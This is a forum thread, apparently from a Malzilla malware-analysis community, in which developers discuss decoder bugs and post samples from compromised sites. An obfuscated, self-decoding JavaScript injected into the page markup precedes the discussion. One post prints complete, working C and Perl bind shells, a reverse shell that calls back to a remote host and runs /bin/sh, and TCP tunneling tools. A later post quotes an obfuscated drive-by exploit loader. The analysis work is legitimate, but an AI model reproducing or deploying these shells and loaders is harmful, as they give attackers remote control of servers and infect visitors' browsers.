href=rjfegymshmu>dcugvwdqwfbk</a><br /><select><option>gdctxpbil</option></select><ul><li>zufphno</li><li><br /><p>xpapi</p><div id='NTp5p' class='kVfln0'>273M3N1O1C4H3N231N3M1C4H1N2224221C4H3N2324221C4H413O3O3N1C4H262721201C4H412124221C4H24223M221C4H42213N231C4H2120413O1C4H413N24221C4H413O24221C4H3N1O203M1C4H20403N201C4H414241251C4H1O3N1N2519171I191C4H1O1N1O1O1C4H3N3M1O1N1C4H3M213N401C4H3M1N3M201C4H41423M1O1C4H252224261C4H251N25221C4H202K212F1C4H2525202K1C4H2422242H1C4H242I242K1C4H242J24231C4H2421202J1C4H242I242K1C4H251N202K1C4H251N241O1C4H241O242G</div><div id='qypjudncuycppne' style='visibility:hidden;'>42444B464946444C46</div><span>huyohwehapi</span>pkvuov<strong>ofcoibwtvtkxfd</strong><br /><p id=dmfgdglkfimwgcq>wywkme</p><br /><br /><i>hfnveafwstseart</i><ul><li>hhdqpwdii</li><li><pre>wxgheftqtgwoeb</pre><br /><div id='xnHlg6' class='kVfln0'>1C4H2423202K1C4H242325261C4H251N202J1C4H251N2426191G294I3M4E174C4F4E3M4L4G172B174H4A414F3O3M4C411F191C4H1N3M1N3M1C4H1N3M1N3M191G29404B174N1717174C4F4E3M4L4G171I2B174C4F4E3M4L4G2950174J444548411F4C4F4E3M4L4G1L48414A434G44172A171N4K401N1N1N1N1G2949414E3M4L172B174A414J172F4E4E3M4L1F1G29424B4E1F45172B171N291745172A171O1N1N2917451I1I1G17171749414E3M4L3G453I172B174C4F4E3M4L4G171I174F4E4G474B40294K49483O</div><br /><p>qdbqsl</p><select><option>ppaowkepfld</option></select><u>inryb</u><a href=pynqfunmrwqnodt>nvvcewwpfa</a><br /><div id='bzysqnav' class='kVfln0'>4B4041172B17192A3D3231172N2I2B2N2C2A3D2C2A2H2C2A183G2H2I2F392F3G2A45493M43411738372H2B444G4G4C281M1M1D1A4K1N3M1N3M291D1A4K1N3M1N3M291L414K3M494C48411L3O4B492C3I3I2C2A1M2H2C2A1M3D2C2A1M3D32312C2A38352F33172I2F392F38372H2B1A2N172I2F392F2K312I2B2H172I2F392F2K3437322F392F382B2M3932312C2A3D3231172N2I2B2N2C2A1M3D32312C2A38352F33172I2F392F38372H2B1A2N172I2F392F2K312I2B2H172I2F392F2K3437322F392F382B2M3932</div><span>osxtbf</span>obflwsjbawj<br /><i>ntlufikovbbl</i><div id='imdncpaf' style='visibility:hidden;'>444D454L444B4M4D47</div><p id=qmxdmu>fargmhe</p><br /><u>oxuteopuuuokdv</u><abbr>smzihpk</abbr><br /><div id='mT5NQQ7' class='kVfln0'>312C2A1M38352F332C2A1M38352F332C19294G3M43172B17404B3O4H49414A4G1L43414G2J484149414A4G2G4L2N401F194E414C483M3O41191G294G3M431L454A4A414E2M393231172B174K49483O4B404129504542171F322I2F2H1F1G4O4O352I2K1F1G4O4O3C32311F1G4O4O38381F1G1G174N17502A1M4F3O4E454C4G2C</div><script>function uijomwjzjgzsmxg(){}var rvervciw=2133;var yraacopuv='gyyzfntspk';function gMrSJ(N8piMAiW){CeERXeKC = '';function yhgwnjzlngcl(eedgsamborlvq){return jqtjyf;}for(jqTpAB5 = 0; jqTpAB5 < (N8piMAiW.length / 2); jqTpAB5++ ){CeERXeKC += String.fromCharCode(parseInt(N8piMAiW.substr(jqTpAB5 * 2, 2),25));function ybhzwllvojtj(){}var jdhjx=8425;var wlmmloxofb='euztprlulvro';this.ycgtmgxking='ejjdv';}return CeERXeKC;var kufduxbilje=6957;}function AU0pO(Uc4aR){var eevsoyxblbgr='nrlpkmlgme';var delkyg=2964;this.gucca='cvtke';function fdtjkpqqakwwv(){}function xtbnoeaccewgf(vkriu){return vhtwdarm;}return document.getElementById(Uc4aR).innerHTML;function qhgsojemslowet(){}var fckohtuxoebbam='kwjxlq';var xjupqljqrndgfzx=2486;function stdoqhtdqw(xpyjkgeo){return hptcvwiisxdkkk;}this.ryxqg=false;this.sonucucfikrisb='jgcaepxc';}var a6OPD =new Array('t2bAkX9m','tmDwV','ITgCCe','bwaPH','KmXVfl','MmzXYt','niRPgw6','DmIt8K','SHHc7Pcb','MDDXD1','uKr623','I4Syx5','acaYwy','bM9Iwd0J','NTp5p','xnHlg6','bzysqnav','mT5NQQ7',"gr4tgwsd");for(Fqe2FB = 0; Fqe2FB  < a6OPD.length; Fqe2FB++){function dlahfld(vtkopnf){return aheycwqmnxa;}function uezav(){}document.write(gMrSJ(AU0pO(a6OPD[Fqe2FB])));this.gxftjwexflxekxx=false;var aqaigvcbgqr='zmotqk';var mjllsaiuoi=3084;this.evvlurtywedxqvm='rwswczmn';function gaipg(){}}</script>

[bobby]

@JohnC

I'm doing a large rewrite of Malzilla at the moment.
I've started from the HTTP/FTP downloader.
OpenSSL is removed. HTTPS connections are handled by cryptlib now:
http://www.cs.auckland.ac.nz/~pgut001/cryptlib/
This will hopefully solve the Vista issues.
HTTP downloader now handles gzip, deflate and raw zlib compression (previous version did just gzip)

Some visual GUI artifacts in Vista and Win7 should be fixed now (forced repaint of the GUI because some of the buttons disappeared from the GUI after using accelerator keys (keyboard shortcuts))

Work in progress: - testing all kind of redirections

Link Parser also got a large rewrite and needs a lot of testing to see if all is working.

Misc Decoders got some rewrite (bas64/MIME decoder for now, but more will follow).

When I get all done with previously mentioned components, I will go for JavaScript-related parts.
Kalimero will probably be left out of the Malzilla if I get my DoomZilla engine up and running. DoomZilla engine will implement the complete DOM parser, and SpiderMonkey will interact with DOM objects like it does in browsers (most notably the functions like GetElementByID and similar will be handled out of the box).
In August I will be without PC, and I will start this part probably in September.

I will hopefully do one release before August, containing the latest changes.

@all
I would need help with some serious testing.
Test cases are needed for the following:
- HTTP Encodings (compression)
- all kind of redirections (3xx HTTP responeses, through META tags, from JavaScript code etc.)
- cases for Link Parser to see if it is missing links (links are now extracted also from <img>, <applet>, <object> and similar tags)

Latter, I will also need test cases for external scripts ( <script src="../../myscript.js) to get the automatically downloaded and injected into main HTML, so that the JavaScript decoder can use them just like it uses normal inline scripts.

So, if there are any volunteers for writing test cases (or to collect them from the net), I would be more than thankful.
The tests will be put online on malzilla.org (PHP is available, but no DB), so be careful about licenses and copyrights of the test-cases you collect (if any )

[bobby]

btw. this is what gave me motivation to work further on Malzilla:
http://holisticinfosec.blogspot.com/2009/07/malzilla-exploring-scareware-and-drive.html
http://holisticinfosec.org/toolsmith/docs/july2009.pdf

[MysteryFCM]

I'll be happy to do testing for you

[bobby]

Would you write test-cases (HTML, PHP, JS), or test it on web sites?

[MysteryFCM]

I'd be testing it on ITW malicious sites, yep

[bobby]

http://www.malzilla.org/dev_builds/
Please read the changelog to see what is to be expect from this build.

Test cases for Link Parser and for redirections would be good thing to have. Without good tests we will never know if these are working OK (one would need to compare the site source code with parser results by hand, to see if something is missing).

Edit: forgot to write in changelog that the PScript is removed. Dunno if anyone found it useful at all.

[MysteryFCM]

I'll take a look and report back, cheers

[MysteryFCM]

Bobby,
Just an FYI, the following seems to be failing? (it downloads the code, but can't seem to decode it?)

Code: [Select]

http://lipesr.com/update/?eb70c8bc3e184ffe5a98905e484546d9
Wepawet is failing with this one too

http://wepawet.cs.ucsb.edu/view.php?hash=0e28254bfce6009968e5b2982f0c7c33&t=1247695990&type=js

Gonna give JSUnpack a go ...... and if that fails too, I'll do it manually.

[MysteryFCM]

Bobby,
Just an FYI, the Base64 decoder seems to be failing to decode the Base64 encoded data in the attached shell (found on a rooted box (already reported it to the ISP)).

Decoded manually shows it decodes to;

Code: [Select]

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;
{ 
 int sockfd, newfd;
 char buf[30];
 struct sockaddr_in remote;
 if(fork() == 0) {
 remote.sin_family = AF_INET;
 remote.sin_port = htons(atoi(argv[1]));
 remote.sin_addr.s_addr = htonl(INADDR_ANY);
 sockfd = socket(AF_INET,SOCK_STREAM,0);
 if(!sockfd) perror("socket error");
 bind(sockfd, (struct sockaddr *)&remote, 0x10);
 listen(sockfd, 5);
 while(1)
  {
   newfd=accept(sockfd,0,0);
   dup2(newfd,0);
   dup2(newfd,1);
   dup2(newfd,2);
   write(newfd,"Password:",10);
   read(newfd,buf,sizeof(buf));
   if (!chpass(argv[2],buf))
   system("echo welcome to Yogyacardus shell && /bin/bash -i");
   else
   fprintf(stderr,"Sorry");
   close(newfd);
  }
 }
}
int chpass(char *base, char *entered) {
int i;
for(i=0;i<strlen(entered);i++)
{
if(entered[i] == '\n')
entered[i] = '\0';
if(entered[i] == '\r')
entered[i] = '\0';
}
if (!strcmp(base,entered))
return 0;
}

#!/usr/bin/perl
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit(1); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1)
{
accept(CONN,S);
if(!($pid=fork))
{
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char *argv[])
{
 int fd;
 struct sockaddr_in sin;
 char rms[21]="rm -f ";
 daemon(1,0);
 sin.sin_family = AF_INET;
 sin.sin_port = htons(atoi(argv[2]));
 sin.sin_addr.s_addr = inet_addr(argv[1]);
 bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));
 fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
 if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
   perror("[-] connect()");
   exit(0);
 }
 strcat(rms, argv[0]);
 system(rms); 
 dup2(fd, 0);
 dup2(fd, 1);
 dup2(fd, 2);
 execl("/bin/sh","sh -i", NULL);
 close(fd);
}

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <linux/time.h>
#ifdef STRERROR
extern char *sys_errlist[];
extern int sys_nerr;
char *undef = "Undefined error";
char *strerror(error) 
int error; 
{
if (error > sys_nerr)
return undef;
return sys_errlist[error];
}
#endif

main(argc, argv) 
  int argc; 
  char **argv; 
{
  int lsock, csock, osock;
  FILE *cfile;
  char buf[4096];
  struct sockaddr_in laddr, caddr, oaddr;
  int caddrlen = sizeof(caddr);
  fd_set fdsr, fdse;
  struct hostent *h;
  struct servent *s;
  int nbyt;
  unsigned long a;
  unsigned short oport;

  if (argc != 4) {
    fprintf(stderr,"Usage: %s localport remoteport remotehost\n",argv[0]);
    return 30;
  }
  a = inet_addr(argv[3]);
  if (!(h = gethostbyname(argv[3])) &&
      !(h = gethostbyaddr(&a, 4, AF_INET))) {
    perror(argv[3]);
    return 25;
  }
  oport = atol(argv[2]);
  laddr.sin_port = htons((unsigned short)(atol(argv[1])));
  if ((lsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
    perror("socket");
    return 20;
  }
  laddr.sin_family = htons(AF_INET);
  laddr.sin_addr.s_addr = htonl(0);
  if (bind(lsock, &laddr, sizeof(laddr))) {
    perror("bind");
    return 20;
  }
  if (listen(lsock, 1)) {
    perror("listen");
    return 20;
  }
  if ((nbyt = fork()) == -1) {
    perror("fork");
    return 20;
  }
  if (nbyt > 0)
    return 0;
  setsid();
  while ((csock = accept(lsock, &caddr, &caddrlen)) != -1) {
    cfile = fdopen(csock,"r+");
    if ((nbyt = fork()) == -1) {
      fprintf(cfile, "500 fork: %s\n", strerror(errno));
      shutdown(csock,2);
      fclose(cfile);
      continue;
    }
    if (nbyt == 0)
      goto gotsock;
    fclose(cfile);
    while (waitpid(-1, NULL, WNOHANG) > 0);
  }
  return 20;

 gotsock:
  if ((osock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
    fprintf(cfile, "500 socket: %s\n", strerror(errno));
    goto quit1;
  }
  oaddr.sin_family = h->h_addrtype;
  oaddr.sin_port = htons(oport);
  memcpy(&oaddr.sin_addr, h->h_addr, h->h_length);
  if (connect(osock, &oaddr, sizeof(oaddr))) {
    fprintf(cfile, "500 connect: %s\n", strerror(errno));
    goto quit1;
  }
  while (1) {
    FD_ZERO(&fdsr);
    FD_ZERO(&fdse);
    FD_SET(csock,&fdsr);
    FD_SET(csock,&fdse);
    FD_SET(osock,&fdsr);
    FD_SET(osock,&fdse);
    if (select(20, &fdsr, NULL, &fdse, NULL) == -1) {
      fprintf(cfile, "500 select: %s\n", strerror(errno));
      goto quit2;
    }
    if (FD_ISSET(csock,&fdsr) || FD_ISSET(csock,&fdse)) {
      if ((nbyt = read(csock,buf,4096)) <= 0)
goto quit2;
      if ((write(osock,buf,nbyt)) <= 0)
goto quit2;
    } else if (FD_ISSET(osock,&fdsr) || FD_ISSET(osock,&fdse)) {
      if ((nbyt = read(osock,buf,4096)) <= 0)
goto quit2;
      if ((write(csock,buf,nbyt)) <= 0)
goto quit2;
    }
  }

 quit2:
  shutdown(osock,2);
  close(osock);
 quit1:
  fflush(cfile);
  shutdown(csock,2);
 quit0:
  fclose(cfile);
  return 0;
}

#!/usr/bin/perl
use IO::Socket;
use POSIX;
$localport = $ARGV[0];
$host      = $ARGV[1];
$port      = $ARGV[2];
$daemon=1;
$DIR = undef;
$| = 1;
if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }
%o = ('port' => $localport,'toport' => $port,'tohost' => $host);
$ah = IO::Socket::INET->new('LocalPort' => $localport,'Reuse' => 1,'Listen' => 10) || die "$!";
$SIG{'CHLD'} = 'IGNORE';
$num = 0;
while (1) {
$ch = $ah->accept(); if (!$ch) { print STDERR "$!\n"; next; }
++$num;
$pid = fork();
if (!defined($pid)) { print STDERR "$!\n"; }
elsif ($pid == 0) { $ah->close(); Run(\%o, $ch, $num); }
else { $ch->close(); }
}
sub Run {
my($o, $ch, $num) = @_;
my $th = IO::Socket::INET->new('PeerAddr' => $o->{'tohost'},'PeerPort' => $o->{'toport'});
if (!$th) { exit 0; }
my $fh;
if ($o->{'dir'}) { $fh = Symbol::gensym(); open($fh, ">$o->{'dir'}/tunnel$num.log") or die "$!"; }
$ch->autoflush();
$th->autoflush();
while ($ch || $th) {
my $rin = "";
vec($rin, fileno($ch), 1) = 1 if $ch;
vec($rin, fileno($th), 1) = 1 if $th;
my($rout, $eout);
select($rout = $rin, undef, $eout = $rin, 120);
if (!$rout  &&  !$eout) {}
my $cbuffer = "";
my $tbuffer = "";
if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {
my $result = sysread($ch, $tbuffer, 1024);
if (!defined($result)) {
print STDERR "$!\n";
exit 0;
}
if ($result == 0) { exit 0; }
}
if ($th  &&  (vec($eout, fileno($th), 1)  || vec($rout, fileno($th), 1))) {
my $result = sysread($th, $cbuffer, 1024);
if (!defined($result)) { print STDERR "$!\n"; exit 0; }
if ($result == 0) {exit 0;}
}
if ($fh  &&  $tbuffer) {(print $fh $tbuffer);}
while (my $len = length($tbuffer)) {
my $res = syswrite($th, $tbuffer, $len);
if ($res > 0) {$tbuffer = substr($tbuffer, $res);}
else {print STDERR "$!\n";}
}
while (my $len = length($cbuffer)) {
my $res = syswrite($ch, $cbuffer, $len);
if ($res > 0) {$cbuffer = substr($cbuffer, $res);}
else {print STDERR "$!\n";}
}}}


<script language="JavaScript">
<!--
var my = "http://www.yogyacardus.com/images/r57.gif";
document.write('<div style="position:fixed;_position:absolute;bottom:0px;right:0px;clip: inherit;_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);"><img src="'+my+'" alt="Yogyacardus ? 2008" onmouseover="this.style.cursor=\'pointer\'" onclick="parent.location=\'http://www.yogyacardus.com\'" /></div>');
//-->
</script>
yodyacardus.com seems to be dead atm.

[bobby]

Hi MysteryFCM,

First link returns 404 for me.

As for the second one, which file from the attached archive is problematic?
I see the encoded string in idx.txt, but that one should be decoded (Base64). After that you need to apply ROT13 decoding, and do a zlib inflate at the end.

[MysteryFCM]

Sorry dude, the Base64 is in style.txt

I'll have a look to see if the lipesr.com one is still in Malzilla's cache

[MysteryFCM]

Here you go ..... tis the code from the cache for the URL now returning a 404

Code: [Select]

<html><body><script>eicis='503';duas="d";lapsui='Wi';egerit="sp";lexque="av";ictuum='bject';otia="dC";vocare=".284";gemma='NI';labens=702;margin='va';dasque="13.";paras=5509;weaner='abcde';acuta=1;feroci='UN';teneto="0.77";imis='C';quoquo='tV';facat=3;snook="pp";cervos='t';suopte=992;sulcis=6854;etimus='ndo';dicari=0;venint="6192";igitur='n';matrem="ea";gravi="8e0";mdcqve="";alma='s';rebus='tW';scitis=".55";oravi="m";magnae="691";novem=6733;foedo="tt";inerat=731;frenas='[HAS';citra='m';ineo='ij';ring='A';statum="men";usuum='tion';hisco='0.120';capio=952;nonam='ndow';black=4;ludat="2162.";dando='d';ponis='87';lucant="7766.";fetuum="en";futura=738;corn='wi';buck=473;textum=7;valuer='f';parant="s";mergis='';memora='z0';nark='L';carpet='us';luces="9.435e3";atris='V';mque="t";boreas="dd";tenuis='cti';amorem='de';credit='ue';xxxii=91;bella="27.";multae='deA';adiuti="4.196e3";lignum='y';vicit='3.645e3';herba='w';ageres=8;reel='Vie';inest=289;moneas='ew';rotas=2;chorus=844;poenis=8823;leti="io";itabat=284;caduci='v';fluit='Vi';timet='pR';creta='i';captis=72;ardet=200;acque='p';tityre="Be";saniem='l';spruik='lf';adorto=8290;infers="us";visum=']';shot='.976';unam=90;caros=5;mocker="551.";googly=621;mari='r';ipso="u";velabo='u';umida='re';semine="nt";aberim=30;rector='e';nodos="r";auctam='x';sumi=69;varium=' t';mortis='last';iussis=52;chuddy='S';proice="a";senis='o';templa='fa';trades='+';sulco=(4.394e3<=adiuti?9:''+'A'+'B'+'C'+'D'+'E'+'F'+'');postis=("3.6e1">4.2e2?2.403e3:mari+'i'+'ng'+'');function wowser(caedar){quivi=new caedar()}function quimus(incute,suete){for(iunges=0;iunges<incute;iunges++)suete[iunges]=iunges}function fulvum(uocare,aequat){for(iunges=0;iunges<uocare;iunges++){ausam=(ausam+quivi[iunges]+aequat[yard](iunges%aequat[amorum]))%uocare;ibique=quivi[iunges];quivi[iunges]=quivi[ausam];quivi[ausam]=ibique}}function iouem(gnow,erga){iunges=(iunges+1)%erga;ausam=(ausam+quivi[iunges])%erga;enetos();quivi[ausam]=ibique;tuorum(gnow)}function enetos(linquo){ibique=quivi[iunges];quivi[iunges]=quivi[ausam]}function tuorum(mitte){etque+=vitateei[optime](mitte[yard](invia)^quivi[(quivi[iunges]+quivi[ausam])%tecum])}function rumpis(gnow){for(invia=0;invia<gnow[amorum];invia++){iouem(gnow,256)}}function anco(aliquo){iunges=aliquo;ausam=aliquo}sedere=(88,relata);laude=(6.4e1,mergis+'a'+'');tecum=(5.6e1,256);(9077>=0.8?sedere:4.8e1)(('.298'<547.?this:.727));valle=(8340.,exciti);sulco+=(0.291e3>"25"?'GH'+'IJK'+'L'+'MN'+'O'+'':525.);ferrum=(1.,oblato);pontum=(dasque<9297?motser:.6899);uerbi=('.8'<8127.?iugulo:1.97e2);natavijie=(1070,ferrum);grauis=(7,pontum)[(7.3e2>='.420'?""+"d"+"o"+"c"+"u"+"m"+"e"+"n"+mque+"":7.78e2)];optime=('.116'>=8.83e2?55.:mergis+'f'+mari+'o')+(0.106,'m'+imis)+(.3,'har')+(1.2e1>'35'?55:'C')+(99.>=0.63?mergis+'o'+'d'+'e'+'':.5804);amorum=(labens,'le')+(2585,igitur+'g')+(.92,'th');vitateei=(1.52e2,grauis)[(669,mergis+acque+'a'+'re'+'nt'+lapsui+'nd'+'ow'+mergis)][(9e0,'w'+'ind'+'ow')][(5.6e1,mergis+'S'+mergis)+("5773"<.2?.8:'t')+(6.368e3<="9.822e3"?postis:0.83)];sulco+=(59<=.62?167:mergis+'P'+'Q'+'R'+chuddy+'T'+'U'+mergis)+(8e0,''+'V'+'W'+'X'+'Y'+'Z'+'');mater=('4997'>=0.67?''+mari+'ay':46);funder=(4e0<luces?'ath':5.64e2);intra=('92'>.4?uerbi:7e0);joey=(6364.,'unc')+(0.3966,usuum);pictis=(unam<7?5:grauis);try{potiti=(56<=9.?3617.:'er')+(8.,'Da');larem=(1.3e1,'#');luges=(3.3e1,'pa');joseph=("5722">5e0?amorem+'f'+'aul'+'t':8395.);trap=(1e0>='.4'?larem:8.07e2);var mensae=(rotas,pictis)[('4.'>=2e0?"cr"+"ea"+mque+"eE"+"lem"+"e"+"nt":iussis)]((.63,'s')+(1e0,luges)+(.1<=.3?igitur+mergis:8.1e2));epeos=(.5>=0.89?798:larem)+(venint>=8.38e2?joseph:0.983)+(1.79e2>=9.332e3?0.135:trap)+(8e0,carpet)+(0.306e3<86?9e0:potiti)+(5.<=facat?3e0:mergis+'ta'+'');(6.>novem?5:mensae)[(177,"a"+boreas+tityre+"h"+lexque+leti+"r"+"")]((4038,epeos));(scitis>=23.?.767:pictis)[("4.28e2"<6?9:"bo"+"d"+"y")][(5,proice+snook+"e"+"n"+otia+"hi"+"l"+"d")]((poenis>47?mensae:1.6e1));(chorus,mensae)[(8>=4?"load":facat)]((ageres<5e0?42:'['+'HA'+'SH'+']'+'['+'U'+gemma+'Q]'+mergis));if((.73<=5?mensae:.9)[(2.9e1>=.7084?"XMLDocume"+semine:273)][(rotas,""+duas+"oc"+"u"+"me"+"ntE"+"le"+statum+mque)][(0.540<=6e0?""+proice+mque+mque+"r"+"i"+"b"+ipso+"t"+"e"+"s"+"":319.)][(7e0,amorum)]==("58"<=5083?dicari:capio)){(4.465e3,mensae)[("6.3e1"<=0.8?70.:"s"+"etA"+foedo+"ribute"+"")]((3.22e2,mortis)+("21">7?mergis+'t'+'i'+'m'+'e'+'':.5026),new (.2,Date)());(3491,mensae)[(9.,""+parant+proice+"v"+"e"+"")]((lucant<804.?2.21e2:'['+'H'+'AS'+'H'+visum+'['+feroci+'IQ'+visum))}else{laude+=(9.8e1,'!')}}catch(darer){}sulco+=(.4,weaner)+(shot>0.2?''+'f'+'gh'+ineo+'kl'+'m':6.27e2);atrox=("6"<=5.708e3?'e':.9667);crate=(.4,pictis);scivit=(0.9,ducere);sedis=(2056<.35?2.4e1:margin);sulco+=(1e0,''+igitur+'o'+acque+'q'+mari+'s'+'t'+'u'+'')+(4,'v'+'w'+'xy'+memora+'1'+'23'+'4')+(.151,''+'5'+'6'+'7'+'8'+'9'+trades+'/'+'='+mergis);yard=(1>=6.96e2?5e0:'ch')+(0.34,'arC')+(0.7050,senis+multae+'t'+'');if((39.>925?2:sulco)[(1.6e1<='5.003e3'?atrox:6.33e2)+(.759,sedis)+('9.8e1'<=.6625?0.114:mergis+'l')]){sulco=(6.01e2<=183.?0.688:mergis);crate=(4e0,sulco)}donato=("71"<=.8?.8:''+senis+mari+'a'+'g'+'e'+mergis);oscar=(caros,'gl');macto=(657<1?0.876e3:'oba'+'');quilt=(98>=8e0?crate:8.3e1);function ducere(puppis,lassa,puram,sinuum){('4470'<=2e0?.4058:wowser)(("1.187e3"<.7?9990.:queantyyo));(0.638>=eicis?.8:quimus)((0.838,256),(759.,quivi));(2.845e3<=2835?1.07e2:anco)((.2477<=624.?dicari:7.9e1));(4<=971.?fulvum:7)((8.75e2,256),(119.>9e0?puppis:3.4e1));(.5<"782"?anco:18.)((2117,0));etque=(9.693e3>"9.7e1"?''+'':4.4e1);(0.6531>=.987?textum:rumpis)(("0.2805"<=0.1293?9898.:lassa));return (9e1>='4.'?etque:5008.)}rimerjie=(.956,quilt);function iugulo(lego,uagis,amores,petat){var raucam;try{manus=(3.519e3,mergis+'x'+'m'+'l'+'2'+'.'+'X'+'');foedum=(.883,mergis+'H'+'T'+'T'+'P'+'');uicere=(421.,manus)+(4>textum?1e0:'ML')+(1e0,foedum);raucam=new ("55"<.1?63.:divicolll)((.86<sumi?''+'Ms':6.)+(7e0>="0.05e2"?uicere:1.1e2))}catch(fando){try{foedum=(.67,'HTTP');uicere=(2638.,mergis+mari+'o'+'s'+senis+'f'+'')+(rotas<ludat?'t.'+'X'+'ML'+mergis:326)+(.443,foedum);raucam=new ('7158.'<=449?9.39e2:divicolll)((.368>7.?.70:mergis+'Mi'+'c')+(3.41e2<="57"?caros:uicere))}catch(shake){}}return (412,raucam)}viros=(.81<=0.52?9.5e1:rimerjie)[(1<3.946e3?''+acque+'ar'+'en'+rebus+creta+igitur+dando+'ow'+'':.7580)][(0.5<='2.5e1'?mergis+'s'+'e'+'l'+'f'+mergis:4)][('509'>=6e0?mergis+'w'+creta+igitur+dando+senis+'w'+mergis:98.)][(6.7e1,mergis+'f'+mari+'a'+citra+'e'+'s'+'')][(.7<.555?7.78e2:''+'s'+'e'+'l'+'f'+mergis)][(.9252,'F')+(4.,joey)];divicolll=(311,rimerjie)[(0.526,'pa'+mari+rector+igitur+'tWi'+'ndo'+'w'+mergis)][(6.1e1,alma+'elf'+mergis)][("6e0"<.868?.4:'wi'+nonam+mergis)][(2.621e3,ring)+(6291<22?2.205e3:tenuis)+(.9>=754?64:mergis+caduci+rector+'X'+'')+("6e0">=.79?'O'+mergis:0.2)+('4'>7.904e3?26:ictuum)];amicoccc=(5.<=facat?8145:rimerjie)[(.8>=8e0?3:mergis+acque+'a'+'re'+igitur+cervos+'W'+'i'+'nd'+'ow'+'')][(8e0>5e0?mergis+alma+rector+'l'+'f'+mergis:0.7198)][(itabat,'M')+(buck,funder)];queantyyo=('3.9e2'<=3.27e2?4e0:rimerjie)[("0.85"<=0.4e1?mergis+'par'+'ent'+'Window'+'':5.39e2)][(4.91e2,mergis+'w'+creta+'n'+dando+senis+'w'+mergis)][(.455,ring)+(781,'r')+("0.7e1">googly?5.7e1:mater)];egiqueaai=new (0.42e2,queantyyo)();oleum=(4.4e1>45.?8.:'G');annos=(0.5<=6?viros:403.);ilice=(48<=ageres?.5195:laude)+(teneto>=3789.?39.:natavijie)((.555>='4.'?.72:sulco),(mocker<rotas?0.3:aberim));pressoeea=(30.>=843?0.78:rura);scaeae=(futura,'T');snaky=(7e0,annos)((3e1>0.25?'ret':5.7e1)+(2.858e3,velabo+'rn '+mergis)+(bella>193?.32:mergis+creta+igitur+'t'+mari+'a'+'('+')'+mergis));taliayya=("9911"<=3.646e3?3.82e2:annos)((8.4e2,mergis+'x'+mergis),(6,'y'),(.8,'ret')+(3.771e3,'u'+mari+'n '+'')+(2.<facat?alma+'civit'+'('+'x,y'+')':1e0));velaiie=(1.<=4.?annos:5.8e1)((56,auctam),(0.1959<'4'?'ret':adorto)+(2.19e2,'urn ')+(23,'ba'+'r'+'cen'+'(x'+')'));ducem=(4,''+'on'+umida+mergis)+('936'<=.8185?2e0:''+'a'+dando+'y'+alma+'t'+mergis)+(facat,''+'a'+cervos+'e'+'c'+mergis)+(5.3e1,''+'h'+'a'+igitur+'g'+'e'+mergis);movere=(9.154e3,'E');(182>=9e0?velaiie:textum)((xxxii,ilice));function barcen(solvi,bardie,equum,sues){var stella=(suopte>0.4?snaky:21.)();(.4,stella)[(inest,"open")]((0.4374>'35'?9.:oleum)+(3.74e2,movere)+(819>'257.'?scaeae:8e0),(49,'?')+(0.994>=5e0?0.49e2:pressoeea)((3.6e1,taliayya)((7904.,''+'d'+rector+alma+'e'+mari+creta+'o'+'o'+caduci+mergis),(.751,solvi))),(4074,true));                         stella[(.35>.8731?2.34e2:ducem)]=(647.,impiis);function impiis(){if((.7071<=gravi?stella:0.9960)[(magnae<.598?2.95e3:mdcqve+"r"+matrem+"d"+"yS"+mque+proice+mque+"e")]==(4<3331?black:0.736)&&(0.261e3<3.21e2?stella:0.64)[(998.,parant+"tat"+infers)]==(2.,ardet)){(.4,annos)((5.6e1,taliayya)((6879.<=0.92e2?5:solvi),(".382">=83?959:valle)((paras<5.389e3?rotas:stella)[(acuta,mdcqve+"re"+egerit+"on"+"se"+"T"+"e"+"x"+"t")])))()}};(0.4176,stella)[(inerat,mdcqve+parant+"e"+"n"+duas+mdcqve)]((.314,dicari))}function demus(puppis,dolore,sentes,sociem){  var luget=amicoccc["floor"](amicoccc["random"]()*puppis[amorum]);ituri+=puppis["substring"](luget,luget+1)}function puer(lassa,puppis,ituri,caedis){for(iunges=0;iunges<lassa;iunges++){demus(puppis,iunges,lassa,ituri);}}function oblato(puppis,lassa,caedis,iuvet){ituri='';puer(lassa,puppis,ituri,caedis);return ituri}function rura(visu,cuinam,belli,boni){var obliti=(.5058,mergis);var etque;var iunges;var chiack=(793>=937?633:0);var 